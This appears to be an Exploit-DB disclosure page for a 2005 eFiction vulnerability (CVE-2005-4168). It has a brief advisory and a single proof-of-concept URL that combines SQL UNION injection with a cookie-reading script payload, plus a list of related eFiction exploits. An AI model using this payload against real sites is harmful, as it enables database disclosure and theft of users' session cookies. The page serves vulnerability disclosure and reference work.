| EDB-ID: 26592 | Author: retrogod@aliceposta.it | Published: 2005-11-25 | |
| CVE: CVE-2005-4168 | Type: Webapps | Platform: PHP | |
| Aliases: N/A | Advisory/Source: Link | Tags: N/A | |
E-DB Verified:
|
Exploit:
 Download
/
View Raw
|
Vulnerable App: N/A | |
source: http://www.securityfocus.com/bid/15568/info eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities. These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials. eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected. http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>' ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
Related Exploits
Trying to match CVEs (1): CVE-2005-4168Trying to match OSVDBs (1): 21120
Other Possible E-DB Search Terms: efiction 1.0/1.1/2.0, efiction 1.0, efiction
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2005-11-25 |
|
efiction 1.0/1.1/2.0 - 'sid' SQL Injection | retrogod@al... | |
| 2005-11-25 |
|
efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting | retrogod@al... | |
| 2005-11-25 |
|
efiction 1.0/1.1/2.0 - 'uid' SQL Injection | retrogod@al... | |
| 2005-11-25 |
|
eFiction 2.0 - Fake '.GIF' Arbitrary File Upload | rgod | |
| 2008-06-11 |
|
eFiction 3.0 - 'toplists.php' SQL Injection | Mr.SQL | |
| 2007-02-22 |
|
eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion | ThE dE@Th | |
| 2006-08-25 |
|
eFiction < 2.0.7 - Remote Admin Authentication Bypass | Vipsta |